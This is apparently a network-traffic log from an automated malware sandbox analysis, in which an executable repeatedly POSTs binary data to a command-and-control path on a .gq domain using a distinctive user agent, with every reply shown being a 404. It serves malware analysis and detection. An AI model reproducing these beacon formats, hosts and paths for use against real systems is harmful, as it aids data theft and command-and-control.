Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:20.347126961 CEST	1056	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 196 Connection: close
Oct 14, 2021 08:28:20.460792065 CEST	1057	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hQkFe3UJ1QmCzUsZUQlHGGa3jv5VhF59kyHL%2FAsWX3Cle1Hp0JGwG2RiPxylz6fXh7eYHqVnm1Viov8%2Fg8G0zh1TwiCsMn%2BxPOnxpZErkhdqFG1ph3AcJYoYgnYYS96tyPBQDWnFXqoyO4YpwFfZSNVBuZc%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf3b3ba57057-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49789	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:32.511259079 CEST	1074	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:32.680007935 CEST	1075	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsyKz23oumG1N2Qa6W82cL6U9NuCNhNUuC%2FZVgvvwW%2BDV3gzbbFfzB3%2BNtArLcKJk6RAdkcWIb70IWH9c1BU5tnjxYGlq1KaEkpgcFVk3A%2FjDdAOS0gYz6ayeBdJqQBA9VqH4EPLTxPN245tSgs%2BJ6qZbgIytw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf873cad5c62-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49790	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:33.672461987 CEST	1076	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:33.830368042 CEST	1077	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H68GrAIUZ61ik30eQPT7ieOnffpsCaIqd%2B20QY25W3jNlrWDPyTlhkKHRfJS%2FiUtwct9SjTEfhD8iO%2B5yucBGT673jWQTRVTfa6kc7%2Fx89CXhw5%2Fm91Iu3OgHm5JHlTRSAOWIMlJ6872pwxceJSRHYfcODJ2aQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf8e7a2f2b65-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49791	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:34.890356064 CEST	1078	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:35.044509888 CEST	1079	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZ0sVZ19FquxOnQnQ8eV27mBYy1WgM0CUPb1NNnWMJzxc3043xzagNkBokq638MVdi87wkRVwA%2FaDhBllVz6Wa7tU%2BXqwhXPidoHFsE7wvUTdAVBYElnVusQQa8dyaLYa2RuJ8MO2LY4BrfzJZWgJLGhDagHvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf9619e27025-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49792	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:35.993002892 CEST	1080	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:36.144937992 CEST	1081	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cfaTZhkdZ%2B4BJCg2NEEt3iB1wdphtOW7vYogkgF6ssnB0JtOYVEcfiVEntxnGT8GGYD49JE7n6oNLeWj%2BaC3dp6n%2FnvCW6Yfyv6vLBoDeaIyz7FL%2BFkuxcREOUryCFN7LVICmGTi487rSg3JKSZqNWUkm5jFTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf9cfa384a85-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49793	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:37.119939089 CEST	1082	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:37.232311010 CEST	1083	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yx4q2GcB87W4VIt%2F6Bl3361rtQSoUi34qsv3Q1MEZfb%2BSUNJrztSsb%2BJ14kBZzFEMs0Tkh%2F8iKsclQJnJlu7SyIBt6Rz6eoZ8nTufwUUBVTn4sWWS4kQt51roLWM4G0PcAOACqu4oY8Th1%2B801eD8ZrqSMLkmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfa408094e97-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49794	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:38.386394024 CEST	1084	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:38.540837049 CEST	1085	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pn8lTUVtVtKkV%2B9%2FhI5pH%2Bbv3JxxkgBA0SYiWdJIlkIQKZcw5zH1I8kAF6QAJOIRQjkM%2BOmDifl0B6xVMTePviWGDxi0zLdm1s%2FnLGulx3kj4q8F2zNoVyQpgtSXW0TCRUbCOKrT9TH7mteyHIsbeqJURSgUUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfabfe766933-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49795	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:39.512557030 CEST	1086	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:39.669177055 CEST	1088	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fbYEyM1Gh6WdAzvjkUrxUJ61%2BI86%2FMQWYOt736TgF8PYXX4xRDCoMqDGqnuxaI5J8NZQWEAAFQmX57qs%2BjEX9BOBANnKvqJQwuiSDuZUH%2FmkItpnH6MouMDIgY94Ubkv2Xr%2FP6LV0udfFhbt0DzGN4dYvRJYjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfb2ffc45bdd-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49798	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:41.105942011 CEST	1107	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:41.219671965 CEST	1108	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tnOYS6v1%2BDryLySE0XRA3DanDggqIU5lD1efwHzLdufMHOXHG4q7dfhWoqlzoX5wDgi%2BczRB82cB78sgINYZ70528recLHfPp2P6sSiGDKYiKmOnVIaMSw3%2FJ%2FTVZtL%2FZnQlEs8dl3y5rZsfxnVPclRPmHDLkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfbcfff06925-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49799	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:42.274934053 CEST	1109	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:42.387685061 CEST	1110	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0EH47MMNXBWoZhSTeJKDFH5ttH4eNOc7DIMbRM5RUcGlJfPGdlM2qgJ%2FydGTeU89PVVspTxJUD78%2FLsz4jje9NE8J9ra8L440XXrJYNDu3lHjX7Az2%2FQMSbcG0NHixWuQ8qg3I%2FvBmZH39V3W4%2BLjJC5wpkOjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfc43f923240-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49800	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:43.873245001 CEST	1111	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:43.996604919 CEST	1112	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=krWVnXC%2BdefgGbNlcpBvuV%2B%2FEt1AN8TvqNCkwdnHu1u%2B%2Br4NhUyvinuefOGVyWbc9ShnhxYhW4%2BuqcpJdGFs2cOx%2Bg6Ex6pVLOOMw3MGB8imhhNCOi5JQPVnEFzH54P2wj3uTDGZgD%2B%2BgOSe36UWuNVLFTWpSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfce38355bed-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49781	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:21.339482069 CEST	1058	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:21.535239935 CEST	1059	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gywdBNFWVFKIiZY3FEiKOzs84VMPVYr0KsnkFxu9YBLF66h9wh5gFt%2BKvxTgQoptbBobPo4zo%2FqKzOkAcdBuhuoMMrcjb2wrOtLU4%2BScQPJGN05F5R8f5lBn8MTmqMmHsvXJe26qCeRgvef6Z2NcGbvmdK2vnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf4179ac16e6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49801	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:45.343358994 CEST	1113	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:45.464049101 CEST	1114	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CpHKxOLOrpPIM1PF5NEE6vUZ3l5dbYDOl6UNrbCahs5hxC4aJJGhGN7oKjrOL0BSNTAo1uQVbVx5SYG5UeeMMxOeU8B5DsuS3mvrPAdrCRib2ajEVOGtz7to8pV1YDKcBopo%2FKcmdVe3ptFDjf6kWXXiTMwHzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfd76c86440d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49802	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:48.039638042 CEST	1115	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:48.163419962 CEST	1116	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xX8MVuCGjS0FNM%2FvuL2BD8nyHgscINdYF2sTG5gdSsMS3%2F808sSrsFsd18a3PVjF22lX8c6mqEJFN4gRhXrpUEkmDty5RH6trK9n7XiwuMhOgsGG0JxWNKvSSmXgx%2F38h9tCGGDosMS%2FwDye9z6hmxb7OGqF0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debfe84d3e4309-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49803	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:49.659260988 CEST	1117	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:49.774518013 CEST	1118	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3nVDbQqzeq99VtQdxhWX%2Fj7fXtAJV7srTKCv221y2RZh2a%2F8IS0yw3Zf9GABw%2F42RW46cAvIOehRvvP4M6%2FyJSAId%2Bgjb24pBzUjcG3sOSc%2FJAPaXI%2FrScX7pLEjJO5mSc8ztul8%2Bxk3KF3VKTeg%2Fa5igJ67pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debff26ef15c2c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49804	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:50.976326942 CEST	1119	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:51.090559006 CEST	1120	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sy0tXiUZGLf%2FShCOiRUnNRckJK1ccZE5lquOjWMUouZuuVvcp%2BfhB5GGR1S0BhIE6pVkDFG%2FzmcmHMOfWnDo6YPcj7m3%2FYYbTB4GxN%2BjA6S6jjPL6chZ1jihY6yWnxqgycQOlIXIPvuqEaE1VHcfl3z2NHMvrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debffaaf320621-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49805	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:52.327367067 CEST	1121	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:52.449971914 CEST	1122	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0%2F0G%2FltPrkYLGxzRCt9VdfNUMtip3rLXsYuFpJSTw2Tm%2Bkk99WneQCuJnmMJyMyxB%2FadH9hc7Nck4D5MaWnJHgR8m%2BeuWRD%2BWW1k6AEiWmmZ9D3wy1JfLuw3Xnsjx%2F97L17z30dxppqVVpdcP7o%2BEMd9GCUKw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0031f88c2c7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49806	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:53.563440084 CEST	1123	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:53.674302101 CEST	1124	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SNwUQXmpNoSyQjbUBF5l8GTY8SywVTmzZ8AkYzJWy0b1O3O5n7b1dHE%2BpDh78zb6iFJ%2BdNIyBnabgJCYCBp9qDa6TZYlhCr6htZEMFmSRyHaUU%2F5WZkBITRFMBZ70zlWfi%2BTeSLQBR3OnT37qPUC6HdB7R1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec00acb8868e9-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49807	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:54.645978928 CEST	1125	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
